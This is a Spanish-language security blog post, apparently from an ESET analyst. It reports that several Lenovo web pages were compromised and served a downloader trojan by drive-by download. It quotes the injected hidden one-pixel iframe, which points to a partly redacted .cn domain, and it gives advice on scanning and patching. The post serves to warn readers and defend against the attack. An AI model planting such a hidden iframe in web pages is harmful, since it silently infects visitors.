El fin de semana fue descubierto que cinco páginas web del popular fabricante de computadoras Lenovo fueron infectadas y estaban propagando un troyano del tipo downloader. A través del foro de la empresa, se informó el alerta del incidente, que indicaba la presencia de un script malicioso en los sitios web indicados.
El ataque fue realizado sobre los servidores (aparentemente Linux) de la empresa inyectando el siguiente iframe, que direcciona al visitante a un segundo dominio que intenta descargar un malware a través de una técnica de Drive-by-Download:
<iframe src="http://volgo-[ELIMINADO].cn/pek/index.php" width=1 height=1 style="visibility: hidden;"></iframe>
El archivo que se intenta descargar en el sitio destino es detectado por ESET NOD 32 Antivirus como JS/Exploit.Pdfka.OAI, por lo que nuestros usuarios pueden estar tranquilos respecto a la seguridad de sus sistemas. Aunque Lenovo ha informado que el incidente ya ha sido solucionado, se recomienda a aquellos que hayan visitado el sitio durante el fin de semana que exploren sus sistemas en búsqueda de malware. Pueden utilizar de forma gratuita ESET Online Scanner para verificar si su sistema está limpio de archivos maliciosos.
Este tipo de técnicas son de mucha utilidad para los atacantes ya que, al lograr vulnerar sitios populares, logran posicionar el código malicioso en sitios que poseen muchas visitas y que son entendidos como confiables por los cibernautas. Por este tipo de técnicas es que siempre hay que tener instalada una solución de seguridad antivirus con capacidades proactivas de detección y mantener actualizado el navegador con todos los parches de seguridad. No todos los ataques hacen uso de la Ingeniería Social y este es uno de los casos que sin mediación del usuario ni engaño alguno el sistema puede infectarse. ¡A cuidarse!
Sebastián Bortnik
Analista de Seguridad
